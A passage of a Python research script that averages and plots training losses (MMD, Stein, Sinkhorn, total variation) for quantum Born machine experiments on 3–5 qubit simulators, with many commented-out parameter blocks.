ax.fill_between(x, average_loss['TV'] - lower_error['TV'], average_loss['TV'] + upper_error['TV'], alpha=0.2, facecolor= plot_colour[trial] )
axins.plot(x, average_loss['TV'], color ='%s' % plot_colour[trial] , label =r'$\mathsf{MMD}$ for $\kappa_{%s}$, $\eta_{init}$ = %.3f.' %( kernel_type[trial][0], learning_rate[trial]))
axins.fill_between(x, average_loss['TV'] - lower_error['TV'], average_loss['TV'] + upper_error['TV'], alpha=0.2, facecolor= plot_colour[trial] )
elif cost_func[trial].lower() == 'stein':
if score[trial].lower() == 'exact':
# plot_colour = 'r'
ax.plot(x, average_loss['TV'], '-', color ='%s' % plot_colour[trial] , label =r'Stein using Exact score for $\eta_{init}$ = %.3f.'% learning_rate[trial])
ax.fill_between(x, average_loss['TV'] - lower_error['TV'], average_loss['TV'] + upper_error['TV'], alpha=0.2, facecolor= plot_colour[trial] )
axins.plot(x, average_loss['TV'], '-', color ='%s' % plot_colour[trial] , label =r'Stein using Exact score for $\eta_{init}$ = %.3f.'% learning_rate[trial])
axins.fill_between(x, average_loss['TV'] - lower_error['TV'], average_loss['TV'] + upper_error['TV'], alpha=0.2, facecolor= plot_colour[trial] )
elif score[trial].lower() == 'spectral':
# plot_colour = 'm'
ax.plot(loss[trial][('TV')], '-', color ='%s' % plot_colour[trial], label =r'Stein using Spectral score for $\eta_{init}$ = %.3f.' \
% learning_rate[trial])
axins.plot(loss[trial][('TV')], color ='%s' % plot_colour[trial] , label =r'Stein using Spectral score for $\eta_{init}$ = %.3f.' \
%learning_rate[trial])
elif cost_func[trial].lower() == 'sinkhorn':
ax.plot(x, average_loss['TV'],'-', color ='%s' % plot_colour[trial] , label =r'Sinkhorn using Hamming cost, $\eta_{init}$ = %.3f.' % learning_rate[trial] )
ax.fill_between(x, average_loss['TV'] - lower_error['TV'], average_loss['TV'] + upper_error['TV'], alpha=0.2, facecolor= plot_colour[trial] )
axins.plot(x, average_loss['TV'], '-', color ='%s' % plot_colour[trial] , label =r'Sinkhorn using Hamming cost, $\eta_{init}$ = %.3f.' % learning_rate[trial] )
axins.fill_between(x, average_loss['TV'] - lower_error['TV'], average_loss['TV'] + upper_error['TV'], alpha=0.2, facecolor= plot_colour[trial] )
ax.legend(loc='best', prop={'size': 20})
elif comparison.lower() == 'cost':
for trial in range(N_trials):
try:
average_loss, upper_error, lower_error = AverageCostsFromFile(N_epochs[trial], learning_rate[trial], data_type[trial], data_circuit[trial],
N_born_samples[trial], N_data_samples[trial], N_kernel_samples[trial],
batch_size[trial], kernel_type[trial], cost_func[trial], qc[trial], score[trial],
stein_eigvecs[trial], stein_eta[trial], sinkhorn_eps[trial])
except:
print('Average Not found')
loss, born_final_probs, data_probs_final = ReadFromFile(N_epochs[trial], learning_rate[trial], data_type[trial], data_circuit[trial],
N_born_samples[trial], N_data_samples[trial], N_kernel_samples[trial],
batch_size[trial], kernel_type[trial], cost_func[trial], qc[trial], score[trial],
stein_eigvecs[trial], stein_eta[trial], sinkhorn_eps[trial], runs[trial])
if cost_func[trial].lower() == 'mmd':
plot_colour = ['c', 'y', 'g']
x = np.arange(0, len(average_loss['MMD', 'Train']))
plt.plot(x, average_loss['MMD', 'Train'],'%so-' % plot_colour[trial],\
label =r'$\mathsf{MMD}$ on training set using $\eta_{init}$ = %.3f.' % learning_rate[trial] )
plt.fill_between(x, average_loss['MMD', 'Train'] - lower_error['MMD', 'Train'],\
average_loss['MMD', 'Train'] + upper_error['MMD', 'Train'], facecolor= plot_colour[trial], alpha=0.3)
plt.plot(x, average_loss['MMD', 'Test'],'%s-' % plot_colour[trial],\
label =r'$\mathsf{MMD}$ on test set using $\eta_{init}$ = %.3f.' % learning_rate[trial] )
plt.fill_between(x, average_loss['MMD', 'Test'] - lower_error['MMD', 'Test'],\
average_loss['MMD', 'Test'] + upper_error['MMD', 'Test'], alpha=0.3, facecolor= plot_colour[trial], interpolate=True)
elif cost_func[trial].lower() == 'stein':
if score[trial].lower() == 'exact':
plot_colour = 'r'
x = np.arange(0, len(average_loss['Stein', 'Train']))
plt.plot(x, average_loss['Stein', 'Train'],'%so-' % plot_colour,\
label =r'Stein using Exact score, $\eta_{init}$ = %.3f.' % learning_rate[trial] )
plt.fill_between(x, average_loss['Stein', 'Train'] - lower_error['Stein', 'Train'],\
average_loss['Stein', 'Train'] + upper_error['Stein', 'Train'], alpha=0.3, facecolor=plot_colour)
elif score[trial].lower() == 'spectral':
plot_colour = 'm'
plt.plot(loss[('Stein', 'Train')], '%so-' % plot_colour, \
label =r'Stein on training set using Spectral score, $\eta_{init}$ = %.3f.' %(learning_rate[trial] ))
plt.plot(loss[('Stein', 'Test')], '%s-' % plot_colour,\
label =r'Stein on test set using Spectral score, $\eta_{init}$ = %.3f.' %( learning_rate[trial]))
elif cost_func[trial].lower() == 'sinkhorn':
plot_colour = 'b'
x = np.arange(0, len(average_loss['Sinkhorn', 'Train']))
plt.plot(x, average_loss['Sinkhorn', 'Train'],'%so-' % plot_colour,\
label =r'Sinkhorn on training set using Hamming cost, $\eta_{init}$ = %.3f.' % learning_rate[trial] )
plt.fill_between(x, average_loss['Sinkhorn', 'Train'] - lower_error['Sinkhorn', 'Train'],\
average_loss['Sinkhorn', 'Train'] + upper_error['Sinkhorn', 'Train'], alpha=0.3)
plt.plot(x, average_loss['Sinkhorn', 'Test'],'%s-' % plot_colour,\
label =r'Sinkhorn on test set using Hamming cost, $\eta_{init}$ = %.3f.' % learning_rate[trial] )
plt.fill_between(x, average_loss['Sinkhorn', 'Test'] - lower_error['Sinkhorn', 'Test'],\
average_loss['Sinkhorn', 'Test'] + upper_error['Sinkhorn', 'Test'], alpha=0.3, facecolor=plot_colour, interpolate=True)
plt.legend(loc='best', prop={'size': 20})
plt.show()
return
[N_epochs, learning_rate, data_type, data_circuit, N_born_samples, N_data_samples, N_kernel_samples, batch_size, kernel_type, \
cost_func, qc, score, stein_eigvecs, stein_eta, sinkhorn_eps, runs] = [[] for _ in range(16)]
'''THREE QUBITS'''
# N_epochs.append(200)
# learning_rate.append(0.01)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('MMD')
# qc.append('3q-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.01)
# runs.append(0)
# N_epochs.append(200)
# learning_rate.append(0.05)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('MMD')
# qc.append('3q-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(1)
# runs.append(0)
# N_epochs.append(200)
# learning_rate.append(0.1)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('MMD')
# qc.append('3q-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(1)
# runs.append(0)
# N_epochs.append(200)
# learning_rate.append(0.01)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('Sinkhorn')
# qc.append('3q-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.1)
# runs.append(0)
# N_epochs.append(200)
# learning_rate.append(0.08)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('Stein')
# qc.append('3q-qvm')
# score.append('Exact')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.08)
# runs.append(0)
# N_epochs.append(200)
# learning_rate.append(0.01)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(40)
# N_data_samples.append(40)
# N_kernel_samples.append(2000)
# batch_size.append(20)
# kernel_type.append('Gaussian')
# cost_func.append('Stein')
# qc.append('3q-qvm')
# score.append('Spectral')
# stein_eigvecs.append(4)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.08)
# runs.append(0)
'''################################'''
'''FOUR QUBITS'''
'''################################'''
# N_epochs.append(200)
# learning_rate.append(0.01)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('MMD')
# qc.append('4q-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.05)
# runs.append(0)
# N_epochs.append(200)
# learning_rate.append(0.05)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('MMD')
# qc.append('4q-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.05)
# runs.append(0)
# N_epochs.append(200)
# learning_rate.append(0.1)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('MMD')
# qc.append('4q-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.05)
# runs.append(0)
# N_epochs.append(200)
# learning_rate.append(0.05)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('Sinkhorn')
# qc.append('4q-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(1)
# runs.append(0)
# N_epochs.append(200)
# learning_rate.append(0.05)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('Stein')
# qc.append('4q-qvm')
# score.append('Exact')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.1)
# runs.append(0)
# N_epochs.append(200)
# learning_rate.append(0.01)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(50)
# N_data_samples.append(50)
# N_kernel_samples.append(2000)
# batch_size.append(25)
# kernel_type.append('Gaussian')
# cost_func.append('Stein')
# qc.append('4q-qvm')
# score.append('Spectral')
# stein_eigvecs.append(6)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.08)
# runs.append(0)
# CompareCostFunctions(N_epochs, learning_rate, data_type, data_circuit,
# N_born_samples, N_data_samples, N_kernel_samples,
# batch_size, kernel_type, cost_func, qc, score,
# stein_eigvecs, stein_eta, sinkhorn_eps, runs, 'probs', legend =True)
###################################################################################################################
# #Compute MMD Averages and error bars over certain number of runs
###################################################################################################################
def AverageCost(N_epochs, learning_rate, data_type, data_circuit, N_born_samples, N_data_samples, N_kernel_samples,
batch_size, kernel_type, cost_func, qc, score, stein_eigvecs, stein_eta, sinkhorn_eps, runs):
'''
This function reads in a number of runs, each run has the same parameters: computes average losses, and error and prints to a new file
'''
loss, born_final_probs, data_probs_final = ReadFromFile(N_epochs, learning_rate, data_type, data_circuit,
N_born_samples, N_data_samples, N_kernel_samples,
batch_size, kernel_type, cost_func, qc, score,
stein_eigvecs, stein_eta, sinkhorn_eps, runs)
N_runs = len(runs)
TV_loss_total = np.zeros_like(loss[0]['TV'])
CostTrain_loss_total = np.zeros_like(loss[0][('%s' %cost_func[0], 'Train')])
CostTest_loss_total = np.zeros_like(loss[0][('%s' %cost_func[0], 'Test')])
[average_loss, error_upper, error_lower] = [{} for _ in range(3)]
for run in range(N_runs):
TV_loss_total += loss[run]['TV']
CostTrain_loss_total += loss[run][('%s' %cost_func[run], 'Train')]
CostTest_loss_total += loss[run][('%s' %cost_func[run], 'Test')]
N_epochs = N_epochs[0]
average_loss['TV'] = TV_loss_total/N_runs
average_loss[('%s' %cost_func[run], 'Train')] = CostTrain_loss_total/N_runs
average_loss[('%s' %cost_func[run], 'Test')] = CostTest_loss_total/N_runs
[TV_max, TV_min, cost_train_max, cost_train_min, cost_test_max, cost_test_min] = [np.zeros(N_epochs-1) for _ in range(6)]
for epoch in range(N_epochs-1):
temp_tv = []
temp_cost_test = []
temp_cost_train = []
for run in range(N_runs):
temp_tv.append(loss[run]['TV'][epoch])
temp_cost_test.append(loss[run][('%s' %cost_func[run], 'Test')][epoch])
temp_cost_train.append(loss[run][('%s' %cost_func[run], 'Train')][epoch])
TV_max[epoch] = max(temp_tv)
cost_train_max[epoch] = max(temp_cost_train)
cost_test_max[epoch] = max(temp_cost_test)
TV_min[epoch] = min(temp_tv)
cost_train_min[epoch] = min(temp_cost_train)
cost_test_min[epoch] = min(temp_cost_test)
error_upper['TV'] = np.absolute(average_loss['TV'] - TV_max)
error_upper[('%s' %cost_func[0], 'Train')] = np.absolute(average_loss[('%s' %cost_func[0], 'Train')] - cost_train_max)
error_upper[('%s' %cost_func[0], 'Test')] = np.absolute(average_loss[('%s' %cost_func[0], 'Test')] - cost_test_max)
error_lower['TV'] = np.absolute(average_loss['TV'] - TV_min)
error_lower[('%s' %cost_func[0], 'Train')] = np.absolute(average_loss[('%s' %cost_func[0], 'Train')] - cost_train_min)
error_lower[('%s' %cost_func[0], 'Test')] = np.absolute(average_loss[('%s' %cost_func[0], 'Test')] - cost_test_min)
return average_loss, error_upper, error_lower
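# Minimal usage sketch (added; hypothetical argument lists, mirroring the commented 5q-qvm Sinkhorn runs below):
# every list entry describes one repetition of the same experiment, differing only in the trailing run index.
# avg_loss, err_upper, err_lower = AverageCost([200]*5, [0.01]*5, ['Bernoulli_Data']*5, ['IQP']*5,
#                                              [500]*5, [500]*5, [2000]*5, [250]*5, ['Gaussian']*5,
#                                              ['Sinkhorn']*5, ['5q-qvm']*5, ['Approx']*5, [3]*5,
#                                              [0.01]*5, [1]*5, list(range(5)))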
def PrintAveragesToFiles(N_epochs, learning_rate, data_type, data_circuit, N_born_samples, N_data_samples, N_kernel_samples,
batch_size, kernel_type, cost_func, qc, score, stein_eigvecs, stein_eta, sinkhorn_eps, runs):
if all(x == learning_rate[0] for x in learning_rate) is False:
raise ValueError('All Learning Rates must be the same in all inputs.')
elif all(x == sinkhorn_eps[0] for x in sinkhorn_eps) is False:
raise ValueError('All Sinkhorn regularisers must be the same in all inputs.')
average_loss, error_upper, error_lower = AverageCost(N_epochs, learning_rate, data_type, data_circuit, N_born_samples, N_data_samples, N_kernel_samples,
batch_size, kernel_type, cost_func, qc, score,
stein_eigvecs, stein_eta, sinkhorn_eps, runs)
stein_params = [score[0], stein_eigvecs[0], stein_eta[0], kernel_type[0]]
N_samples = [N_data_samples[0], N_born_samples[0], batch_size[0], N_kernel_samples[0]]
trial_name = MakeTrialNameFile(cost_func[0], data_type[0], data_circuit[0], N_epochs[0],learning_rate[0], qc[0], kernel_type[0], N_samples, stein_params, sinkhorn_eps[0], 'Average')
loss_path = '%s/loss/%s/' %(trial_name, cost_func[0])
TV_path = '%s/loss/TV/' %trial_name
loss_path_upper_error = '%s/loss/%s/upper_error/' %(trial_name, cost_func[0])
loss_path_lower_error = '%s/loss/%s/lower_error/' %(trial_name, cost_func[0])
#create directories to store output training information
MakeDirectory(loss_path)
MakeDirectory(TV_path)
MakeDirectory(loss_path_upper_error)
MakeDirectory(loss_path_lower_error)
#Print Upper Bounds on loss errors
np.savetxt('%s/loss/%s/upper_error/train' %(trial_name,cost_func[0]), error_upper[('%s' %cost_func[0], 'Train')])
np.savetxt('%s/loss/%s/upper_error/test' %(trial_name,cost_func[0]), error_upper[('%s' %cost_func[0], 'Test')] )
np.savetxt('%s/loss/TV/upper_error' %(trial_name), error_upper[('TV')])
#Print Lower Bounds on loss errors
np.savetxt('%s/loss/%s/lower_error/train' %(trial_name,cost_func[0]), error_lower[('%s' %cost_func[0], 'Train')])
np.savetxt('%s/loss/%s/lower_error/test' %(trial_name,cost_func[0]), error_lower[('%s' %cost_func[0], 'Test')] )
np.savetxt('%s/loss/TV/lower_error' %(trial_name), error_lower[('TV')])
np.savetxt('%s/loss/%s/train_avg' %(trial_name,cost_func[0]), average_loss[('%s' %cost_func[0], 'Train')])
np.savetxt('%s/loss/%s/test_avg' %(trial_name,cost_func[0]), average_loss[('%s' %cost_func[0], 'Test')] )
np.savetxt('%s/loss/TV/average' %(trial_name), average_loss[('TV')]) #Print Total Variation of Distributions during training
return
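# The calls above write, per averaged trial, a directory tree of the form
#   <trial_name>/loss/<cost_func>/{train_avg, test_avg, upper_error/{train,test}, lower_error/{train,test}}
#   <trial_name>/loss/TV/{average, upper_error, lower_error}
# which AverageCostsFromFile is expected to read back when the plotting functions below are used.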
# N_epochs.append(200)
# learning_rate.append(0.01)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('Sinkhorn')
# qc.append('5q-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(1)
# runs.append(0)
# N_epochs.append(200)
# learning_rate.append(0.01)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('Sinkhorn')
# qc.append('5q-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(1)
# runs.append(1)
# N_epochs.append(200)
# learning_rate.append(0.01)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('Sinkhorn')
# qc.append('5q-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(1)
# runs.append(2)
# N_epochs.append(200)
# learning_rate.append(0.01)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('Sinkhorn')
# qc.append('5q-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(1)
# runs.append(3)
# N_epochs.append(200)
# learning_rate.append(0.01)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('Sinkhorn')
# qc.append('5q-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(1)
# runs.append(4)
# PrintAveragesToFiles(N_epochs, learning_rate, data_type, data_circuit,N_born_samples, N_data_samples, N_kernel_samples,
# batch_size, kernel_type, cost_func, qc, score, stein_eigvecs, stein_eta, sinkhorn_eps, runs)
####################################################################################################################
# #Plot Single Cost
###################################################################################################################
def PlotSingleCostFunction(N_epochs, learning_rate, data_type, data_circuit,
N_born_samples, N_data_samples, N_kernel_samples,
batch_size, kernel_type, cost_func, qc, score,
stein_eigvecs, stein_eta, sinkhorn_eps, comparison, legend = True):
loss, born_final_probs, data_probs_final = ReadFromFile(N_epochs, learning_rate, data_type, data_circuit,
N_born_samples, N_data_samples, N_kernel_samples,
batch_size, kernel_type, cost_func, qc, score,
stein_eigvecs, stein_eta, sinkhorn_eps,0)
x = np.arange(0, N_epochs-1, 1)
if comparison.lower() == 'cost':
average_loss, upper_error, lower_error = AverageCostsFromFile(N_epochs, learning_rate, data_type, data_circuit, N_born_samples, N_data_samples, N_kernel_samples,
batch_size, kernel_type, cost_func, qc, score, stein_eigvecs, stein_eta, sinkhorn_eps)
if cost_func.lower() == 'mmd':
try:
train_error = np.vstack((lower_error[('MMD', 'Train')], upper_error[('MMD', 'Train')])) #Stack errors into (2d, N_epochs) array for numpy errorbar function
test_error = np.vstack((lower_error[('MMD', 'Test')], upper_error[('MMD', 'Test')])) #Stack errors into (2d, N_epochs) array for numpy errorbar function
except:
pass
plot_colour = 'r'
plt.plot(x, average_loss['MMD', 'Train'],'%so-' % plot_colour,\
label =r'MMD on training set for $\kappa_{%s}$, $\eta_{init}$ = %.3f.' % (kernel_type[0], learning_rate) )
plt.fill_between(x, average_loss['MMD', 'Train'] - lower_error['MMD', 'Train'],\
average_loss['MMD', 'Train'] + upper_error['MMD', 'Train'], alpha=0.3, facecolor='%s'%plot_colour)
plt.plot(x, average_loss['MMD', 'Test'],'%s-' % plot_colour,\
label =r'MMD on test set for $\kappa_{%s}$, $\eta_{init}$ = %.3f.' % (kernel_type[0], learning_rate) )
plt.fill_between(x, average_loss['MMD', 'Test'] - lower_error['MMD', 'Test'],\
average_loss['MMD', 'Test'] + upper_error['MMD', 'Test'], alpha=0.3)
elif cost_func.lower() == 'sinkhorn':
try:
train_error = np.vstack((lower_error[('Sinkhorn', 'Train')], upper_error[('Sinkhorn', 'Train')])) #Stack errors into (2d, N_epochs) array for numpy errorbar function
test_error = np.vstack((lower_error[('Sinkhorn', 'Test')], upper_error[('Sinkhorn', 'Test')])) #Stack errors into (2d, N_epochs) array for numpy errorbar function
except:
pass
plot_colour = 'b'
x = np.arange(0, len(average_loss['Sinkhorn', 'Train']))
plt.plot(x, average_loss['Sinkhorn', 'Train'],'%so-' % plot_colour,\
label =r'Sinkhorn on training set, $\eta_{init}$ = %.3f.' % learning_rate )
plt.fill_between(x, average_loss['Sinkhorn', 'Train'] - lower_error['Sinkhorn', 'Train'],\
average_loss['Sinkhorn', 'Train'] + upper_error['Sinkhorn', 'Train'], alpha=0.5, facecolor=plot_colour)
plt.plot(x, average_loss['Sinkhorn', 'Test'],'%s-' % plot_colour,\
label =r'Sinkhorn on test set, $\eta_{init}$ = %.3f.' % learning_rate )
plt.fill_between(x, average_loss['Sinkhorn', 'Test'] - lower_error['Sinkhorn', 'Test'],\
average_loss['Sinkhorn', 'Test'] + upper_error['Sinkhorn', 'Test'], alpha=0.3, facecolor=plot_colour)
elif cost_func.lower() == 'stein':
if score.lower() == 'exact':
plot_colour = 'c'
plt.plot(loss[('Stein', 'Train')], '%so-' %(plot_colour), label =r'Stein, on training set using Exact score' )
plt.plot(loss[('Stein', 'Test')], '%sx--' %(plot_colour), label =r'Stein, on test set using Exact score ' )
elif score.lower() == 'spectral':
plot_colour = 'm'
plt.plot(loss[('Stein', 'Train')], '%sx-' %(plot_colour), label =r'Stein, on training set using Spectral score' )
plt.plot(loss[('Stein', 'Test')], '%s-' %(plot_colour), label =r'Stein, on test set using Spectral score.' )
plt.legend(loc='best', prop={'size': 20})
plt.show()
elif comparison.lower() == 'tv':
try:
average_loss, upper_error, lower_error = AverageCostsFromFile(N_epochs, learning_rate, data_type, data_circuit, N_born_samples, N_data_samples, N_kernel_samples,
batch_size, kernel_type, cost_func, qc, score, stein_eigvecs, stein_eta, sinkhorn_eps)
except:
pass
x = np.arange(0, N_epochs-1, 1)
if cost_func.lower() == 'mmd':
#Compute Average losses and errors, over a certain number of runs
plot_colour = 'r'
            plt.plot(x, loss['TV'], label =r'TV for MMD with $\kappa_{%s}$, $\eta_{init}$ = %.3f.' % (kernel_type[0], learning_rate) )
# plt.fill_between(x, average_loss['TV'] - lower_error['TV'], average_loss['TV'] + upper_error['TV'], alpha=0.2)
elif cost_func.lower() == 'sinkhorn':
plot_colour = 'b'
plt.plot(x, average_loss['TV'],label =r'Sinkhorn using Hamming cost, $\eta_{init}$ = %.3f.' % learning_rate )
plt.fill_between(x, average_loss['TV'] - lower_error['TV'], average_loss['TV'] + upper_error['TV'], alpha=0.2)
elif cost_func.lower() == 'stein':
if score.lower() == 'exact':
plot_colour = 'c'
plt.plot(loss['TV'], '%so-' %(plot_colour), label =r'Stein using Exact score.')
elif score.lower() == 'spectral':
plot_colour = 'm'
plt.plot(loss['TV'], '%so-' %(plot_colour), label =r'Stein using Spectral score.')
plt.legend(loc='best', prop={'size': 20})
plt.show()
return
'''3 QUBIT SINKHORN'''
# N_epochs = 200
# learning_rate = 0.01
# data_type = 'Bernoulli_Data'
# data_circuit ='IQP'
# N_born_samples = 500
# N_data_samples = 500
# N_kernel_samples = 2000
# batch_size = 250
# kernel_type = 'Gaussian'
# cost_func = 'Sinkhorn'
# qc = '3q-qvm'
# score = 'Approx'
# stein_eigvecs = 3
# stein_eta = 0.01
# sinkhorn_eps = 0.1
# runs = 0
''''4 QUBIT SINKHORN'''
# N_epochs = 200
# learning_rate = 0.05
# data_type = 'Bernoulli_Data'
# data_circuit ='IQP'
# N_born_samples = 500
# N_data_samples = 500
# N_kernel_samples = 2000
# batch_size = 250
# kernel_type = 'Gaussian'
# cost_func = 'Sinkhorn'
# qc = '4q-qvm'
# score = 'Approx'
# stein_eigvecs = 3
# stein_eta = 0.01
# sinkhorn_eps = 1
# runs = 0
# PlotSingleCostFunction(N_epochs, learning_rate, data_type, data_circuit, N_born_samples, N_data_samples, N_kernel_samples,
# batch_size, kernel_type, cost_func, qc, score, stein_eigvecs, stein_eta, sinkhorn_eps, 'cost', legend = True)
# ###################################################################################################################
# #Compare Kernels
###################################################################################################################
def CompareKernelsPlot(N_epochs, learning_rate, data_type, data_circuit,
N_born_samples, N_data_samples, N_kernel_samples,
batch_size, kernel_type, cost_func, qc, score,
stein_eigvecs, stein_eta, sinkhorn_eps, comparison, runs, legend = True):
loss, born_final_probs, data_probs_final = ReadFromFile(N_epochs, learning_rate, data_type, data_circuit,
N_born_samples, N_data_samples, N_kernel_samples,
batch_size, kernel_type, cost_func, qc, score,
stein_eigvecs, stein_eta, sinkhorn_eps, runs)
# print(len(N_epochs), loss)
    if not all(x.lower() == 'mmd' for x in cost_func):
        #All cost functions to be compared must be the MMD
        raise ValueError('All cost functions must be MMD')
else:
if comparison.lower() == 'tv':
if qc[0][0].lower() == '2':
plot_colour = ['rs-', 'r+-', 'ro-', 'bs-', 'b+-', 'bo-']
elif qc[0][0].lower() == '3':
plot_colour = ['rs-', 'b+-', 'ro-', 'bs-', 'b+-', 'bo-']
elif qc[0][0].lower() == '4':
plot_colour = ['rx-', 'bx-', 'c+-', 'mo-']
elif qc[0][0].lower() == '5':
plot_colour = ['rx-', 'bx-']
elif comparison.lower() == 'mmd':
if qc[0][0].lower() == '2':
plot_colour = ['rs-', 'b+-', 'ro-', 'bs-', 'b+-', 'bo-']
elif qc[0][0].lower() == '3':
plot_colour = ['rs-', 'b+-', 'ro-', 'bs-', 'b+-', 'bo-']
elif qc[0][0].lower() == '4':
plot_colour = ['rx-', 'bx-']
N_trials = len(N_epochs)
x = np.arange(0, N_epochs[0]-1, 1)
if comparison.lower() == 'probs':
fig, axs = plt.subplots()
axs.clear()
x = np.arange(len(data_probs_final[0]))
axs.bar(x, data_probs_final[0].values(), width=0.2, color= 'k' , align='center')
axs.bar(x-(0.2*(0+1)), born_final_probs[2].values(), width=0.2, color='b', align='center')
axs.bar(x-(0.2*(0+2)), born_final_probs[-1].values(), width=0.2, color='r', align='center')
axs.legend(('Data',r'$\mathsf{MMD}$ with $\kappa_G$',r'$\mathsf{MMD}$ with $\kappa_Q$'), fontsize=20)
axs.set_xticks(range(len(data_probs_final[0])))
axs.set_xticklabels(list(data_probs_final[0].keys()),rotation=70)
plt.show()
else:
fig, ax = plt.subplots()
if comparison.lower() == 'tv':
if qc[0][0].lower() == '2':
plot_colour = ['rs-', 'b+-', 'ro-', 'bs-', 'b+-', 'bo-']
elif qc[0][0].lower() == '3':
axins = zoomed_inset_axes(ax, 2.5, loc='center')
x1, x2, y1, y2 = 190, 200, 0.01, 0.03 # specify the limits
elif qc[0][0].lower() == '4':
axins = zoomed_inset_axes(ax, 2.5, loc='upper center')
x1, x2, y1, y2 = 180, 200, 0.04, 0.09 # specify the limits
elif qc[0][0].lower() == '5':
axins = zoomed_inset_axes(ax, 2.5, loc='upper center')
x1, x2, y1, y2 = 180, 200, 0.03, 0.09 # specify the limits
axins.set_xlim(x1, x2) # apply the x-limits
axins.set_ylim(y1, y2) # apply the y-limits
plt.xticks(visible=False)
mark_inset(ax, axins, loc1=3, loc2=1, fc="none", ec="0.5")
if comparison.lower() == 'mmd':
if qc[0][0].lower() == '2':
plot_colour = ['rs-', 'b+-', 'ro-', 'bs-', 'b+-', 'bo-']
elif qc[0][0].lower() == '3':
axins = zoomed_inset_axes(ax, 2.5, loc='center')
x1, x2, y1, y2 = 180, 200, 0.00, 0.04 # specify the limits
elif qc[0][0].lower() == '4':
axins = zoomed_inset_axes(ax, 1.5, loc='center')
x1, x2, y1, y2 = 180, 200, 0.00, 0.04 # specify the limits
elif qc[0][0].lower() == '5':
axins = zoomed_inset_axes(ax, 2.5, loc='center')
